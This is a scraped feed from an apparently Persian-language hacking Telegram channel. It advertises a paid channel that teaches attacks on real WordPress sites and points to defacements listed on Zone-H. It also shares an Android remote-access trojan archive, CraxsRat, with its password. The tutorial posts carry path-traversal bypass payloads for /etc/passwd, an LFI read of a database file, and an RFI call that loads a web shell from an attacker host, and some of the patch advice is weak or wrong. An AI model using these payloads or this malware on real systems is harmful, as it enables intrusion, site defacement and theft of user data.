0Day.Today | Learn Exploit | Zero World | Dark web |
19K subscribers
1.23K photos
125 videos
489 files
1.27K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Connect_To_RDP_Program.zip
2.3 MB
برنامه های اتصال به RDP در ویندوز و اندروید :

Windows:
— Remote Desktop Connection 2003
این برنامه برای اتصال NoNLA به RDP استفاده میشه..

—RDP Multi Tool

این برنامه برای مدیریت تعداد زیادی از RDP ها استفاده میشه..‏


android:
—RD Client :
https://play.google.com/store/apps/details?id=com.microsoft.rdc.androidx

آموزش کرک RDP :
@MajesticHackers

—————
@LearnExploit
👍6🔥1
1.txt
261 B
👆👆👆

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍2🔥2
Forwarded from Cyber ​​Lab (KurtLar)
👑 VIP Channel  👑

😵🤔🙁😝😤☹️🙁☹️

ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد

فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره

دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت نام میکنین الان ثبت نام میکنیم

کانال vip وب هکینگ ما متفاوت با همه کانال ها هستش ترکیبی از کانال های vip خارجی و ایرانی چجوری ؟

اینطوری که هم توی کانال ابزار هم شل فایندر کرکر اکسپلویت و در کنار اینها اموزش های مربوط به وب هکینگ قرار داده میشه درواقع شما هم آموزش میبینید هم ابزار دارید

چیا توی کانال وب هکینگ هستش ؟

انواع کرکر
ابزار های مربوط به وب هکینگ
شل فایندر
اکسپلویت

و آموزش های مربوط به وب هکینگ که اینا نمونه اموزش های توی کانال vip وب هکینگ هستش 👇👇👇
t.me/KurtLar0101/489
t.me/KurtLar0101/311
t.me/KurtLar0101/313
t.me/KurtLar0101/315
t.me/KurtLar0101/316
t.me/KurtLar0101/317
t.me/KurtLar0101/330

نمونه ابزار هایی که توی کانال vip قرار داده شده :

t.me/KurtLar0101/377
t.me/KurtLar0101/393

قیمت ۷۱۰ تومان

برای تهیه vip پیام بدین :@Bvrce
🤬2😁1
Forwarded from Cyber ​​Lab (KurtLar)
Cyber ​​Lab (KurtLar)
👑 VIP Channel  👑 😵🤔🙁😝😤☹️🙁☹️ ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت…
و خب در ویدیو های آموزش سایت های واقعی رو مورد اتک و بررسی قرار میدیم درواقع تارگت داریم برای هر باگی و در دنیای واقعی شما میاید تارگت میزنید و ازمایشگاهی به این شکل نخواهیم داشت اگرم ازمایشگاه هم داشته باشیم برای دو سه تا باگ هست که اگه تارگت واقعی برای اونا پیدا نشه توی ازمایشگاه تست بکنیم

و اینکه سایت های وردپرسی رو مورد بررسی قرار میدیم اصلا توی اموزش یاد میدیم چجوری روی یا سایت وردپرسی شل اپلود کنیم هکش کنیم بیشتر تارگت های ما وردپرسیییی هستتد

بنده چندین سال در حوضه وب هکینگ فعالیت داشتم شما میتونید از طریق زون اچ کارای بنده رو مورد بررسی قرار بدین :

https://zone-h.org/archive/notifier=D4LGH4CK_TM
💔1
Cyber ​​Lab (KurtLar)
👑 VIP Channel  👑 😵🤔🙁😝😤☹️🙁☹️ ثبت نام توی کانال وب هکینگ vip برای 6 نفر باز شد فقط برای 6 نفر ثبت نام هست و ثبت نام بعدی معلوم نیست چه تایمی هستش و قراره دوباره ثبت نام بشه یا نه فعلا به 6 ثبت نام داره دوستانی که از قبل میگفتن کی ثبت نام میکنین کی ثبت…
قیمت کانال وی ای پی ۷۱۰ تومان است دوستانی که از طرف ما برن برای ثبت نام ۶۰۰ تومن هستش


درواقع ۱۱۰ تومن تخفیف


رفتید برای ثبت نام بگید از طرف ما اومدین ۱۱۰ تومن تخفیف بگیرین ❤️


برای ثبت نام به این ایدی پیام بدین : @Bvrce
💔1
Forwarded from Cyber ​​Lab (KurtLar)
Linuxconsole😂😂😂😂😂

Mirror : https://zone-h.org/mirror/id/41210067


چن ماه پیش یکی از سایتای گنده جهانو زدیم لینوکس کنسول اره سیستم عامل لینوکس کنسولو دیفیس کردیم

خواستم بگم تو بحث وب هکینگ توی کانال vip توسط یه مدرسی تدریس میشه که چهارتا سایت درست حسابی زده حرفی برای گفتن داره


و خب قراره پاییزو بشینین دیفیس کنین اکسس بگیرین دیتابیس بزنین طعم واقعی وب هکینگ‌ بچشین

اینکه سایتای وردپرسی چجوری هک میشن cms ها چجوری اکسپلویت میشن و.... قراره فله ای روی تارگتای واقعی مانور بدیم

زون اچ ما : https://zone-h.org/archive/notifier=D4LGH4CK_TM


برای ثبت نام تو کانال vip وب هکینگ به ایدی زیر پیام بدین 👇

@Bvrce
👏4👍1💔1
درمورد بایپس ها توی وب هکینگ صحبت کنیم ؟
Anonymous Poll
89%
👍
11%
👎
0Day.Today | Learn Exploit | Zero World | Dark web |
درمورد بایپس ها توی وب هکینگ صحبت کنیم ؟
درمورد بایپس توی حمله File path traversal :

من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله

اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید :
/image?filename=../../etc/passwd

خب اولین روش بایپس :
....//....//etc/passwd

دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم

سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم :
/image?filename=/var/www/image/../../etc/passwd

چهارمین متود یا همون روش :

/image?filename=../../etc/passwd%00.jpg

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤‍🔥2💔1
Forwarded from imem!
در حملات HTTP Smuggling کدام‌ یک از انکودینگ‌های زیر بیشتر استفاده می‌شود؟
Anonymous Quiz
42%
Base64
28%
Chunked
23%
UTF-8
7%
Gzip
❤‍🔥1👍1
باگ xss چه باگیه :

باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم

باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه

کجاها ؟
قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و...

باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم


خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت

ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن

و حمله csrf از زیرمجموعه های باگ xss هستش

و چندین نوع xss داریم :

Xss از نوع Reflected

معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه


Xss از نوع stored

خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد

حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه

و نوع دیگه ای از xss  نوع Dom هستش





خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟

میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php  محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم



#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤‍🔥5👍2💔1
🏃‍♂️ آموزش امنیت سایبری با حل چالش
چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی
🔴 رایت آپ حل چالش ها
🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time

https://t.me/challenginno
باگ HTTP Smuggling چیه؟
ورژن HTTP/1.0:
در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز می‌شد و پس از دریافت پاسخ، این اتصال بسته می‌شد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر می‌شد، به خصوص وقتی درخواست‌های متعددی باید پشت سر هم به یک سرور ارسال می‌شد.

ورژن HTTP/1.1:
در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینه‌سازی اتصال‌ها و کاهش بار شبکه شد:
ویژگی Keep-Alive: این ویژگی اجازه می‌دهد که یک اتصال TCP پس از دریافت پاسخ بسته نشود و برای درخواست‌های بعدی باز بماند. این قابلیت با هدر Connection: keep-alive پیاده‌سازی می‌شود. وقتی از Keep-Alive استفاده می‌شود، کلاینت می‌تواند چندین درخواست HTTP را بدون نیاز به باز و بسته کردن مداوم اتصالات TCP ارسال کند.
برای تست این قابلیت می‌توان از دستور زیر استفاده کرد:
curl --keepalive-time 10 http://theemi.ir/1 http://theemi.ir/2
این دستور به سرور می‌گوید که اتصال TCP را تا 10 ثانیه باز نگه دارد و سپس بسته شود.

ویژگی Pipelining: در این حالت، کلاینت می‌تواند چند درخواست HTTP را به صورت همزمان و پشت سر هم به یک اتصال ارسال کند، بدون اینکه منتظر دریافت پاسخ هر درخواست بماند. پاسخ‌ها نیز به ترتیب ارسال درخواست‌ها از سرور دریافت می‌شوند.
برای تست این قابلیت:
echo -en "GET /path1 HTTP/1.1\r\nHost: theemi.ir\r\n\r\nGET /path2 HTTP/1.1\r\nHost: theemi.ir\r\n\r\n" | nc theemi.ir 80
در اینجا از nc (Netcat) برای باز کردن یک اتصال TCP روی پورت 80 استفاده می‌شود و دو درخواست HTTP به صورت پیپ‌لاین شده ارسال می‌گردند.

انواع Transfer-Encoding:
این هدر برای کنترل نحوه انتقال داده‌ها در پروتکل HTTP استفاده می‌شود و شامل انواع مختلفی است:
chunked
compress
deflate
gzip
identity
مهم‌ترین و پرکاربردترین آن‌ها در این زمینه Chunked است. در انتقال chunked، داده‌ها به قطعات (چانک‌ها) تقسیم شده و به سرور ارسال می‌شوند. هر چانک یک سایز مشخص دارد و با پایان هر چانک، سایز بعدی ارسال می‌شود. این روش معمولاً در ارسال داده‌های آپلودی بزرگ استفاده می‌شود، به طوری که سرور بتواند بدون نیاز به دانستن اندازه کامل محتوا، داده‌ها را دریافت کند.

حمله HTTP Request Smuggling:
این تکنیک حمله زمانی رخ می‌دهد که یک کلاینت (حمله‌کننده) از تفاوت نحوه پردازش درخواست‌ها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بک‌اند ارسال کند.
برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:

فرانت‌اند(Front-end server): سروری که مستقیماً به کلاینت سرویس می‌دهد.
بک‌اند(Back-end server): سروری که درخواست‌های پردازش‌شده را از فرانت‌اند دریافت می‌کند و پاسخ نهایی را به فرانت‌اند می‌دهد
.

ویژگی Keep-Alive و Pipelining بین کلاینت و فرانت‌اند سرور برقرار است، اما بین فرانت‌اند و بک‌اند چنین نیست.
فرانت‌اند درخواست‌ها را به بک‌اند ارسال می‌کند، اما بک‌اند نمی‌تواند درخواست‌ها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواست‌ها بین این دو سرور وجود دارد.

مراحل حمله:
مهاجم دو درخواست به صورت پشت سر هم به فرانت‌اند ارسال می‌کند. فرانت‌اند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بک‌اند ارسال کند.
بک‌اند که به درستی پارس می‌کند، این دو درخواست را جدا از هم می‌بیند و پاسخ اولین درخواست را به فرانت‌اند ارسال می‌کند.
فرانت‌اند این پاسخ را به کلاینت برمی‌گرداند، اما درخواست دوم که در بافر بک‌اند مانده، روی درخواست بعدی قرار می‌گیرد.
این باعث می‌شود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند.
این تفاوت در نحوه پردازش و پارس کردن درخواست‌ها بین سرورهای فرانت‌اند و بک‌اند، منجر به این حمله می‌شود و می‌تواند امنیت سرور و داده‌های کاربران دیگر را به خطر بیندازد.
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
imem!
❤‍🔥10👍4
درمورد باگ lfi و rfi و نحوه به وجود امدن این باگ ها و نحوه پچ کردنشون


Lfi مخفف شده  :
Local file inclusion

باگ rfi مخفف شده :
Remote file inclusion

باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم :
Site.com/index.php?page=../../database.php

مثال خواندن فایل دیتابیس 👆👆

باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند

برای مثال :
target.com/index.php?page=hacker-site.com/shell.txt

همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد

هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include

برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم

روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است

جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini :

برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم

برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم


استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد :
include - include_once - requre - requre_ons


#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍7💔21🔥1
Sending client data to the robot with the help of PowerShell
GITHUB

#Tools——————‌—
IR0Day.Today Bax
@LearnExploit
Forwarded from imem!
CraxsRats v4.9.5.rar
198 MB
craxs rat v4.9.5
Password => @imexemi
Licence : Attackndroid
به هیچ‌وجه روی سیستم اصلی و گوشی خودتون امتحان نکنید

Join => @imexemi
❤‍🔥4👍1😁1
باگ xss و csrf مثل هم هستند در باگ csrf هکر خود را به عنوان کاربر مجاز جعل میکند و سایت این را تشخیص نمیدهد و csrf ایجاد میشود

در باگ xss از اعتماد کاربر به سایت سو استفاده میشود و در باگ csrf از اعتماد سایت به کاربر سو استفاده میشود

باگ csrf مخفف شده :
Cross site request forgery
است

بیشتر اکسپلویت های csrf با زبان html نوشته میشوند و باگ csrf چیزی را نمی سازد بلکه از امکانات سایت با جعل خود به یوزر مجاز استفاده میکند مثل add admin در بسیاری از پنل های مدیریت محتوا که باگ csrf دارند و امکان add admin را هم در پنل خود دارند

باگ csrf سمت کلاینت هست
باگ csrf سخت ترین باگ در path کردن آن است

پچ کردن باگ csrf در متود post سخت تر از پچ کردن باگ csrf در متود get است

بهترین روش برای جلوگیری از باگ csrf تعریف سشن و توکن است

#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
2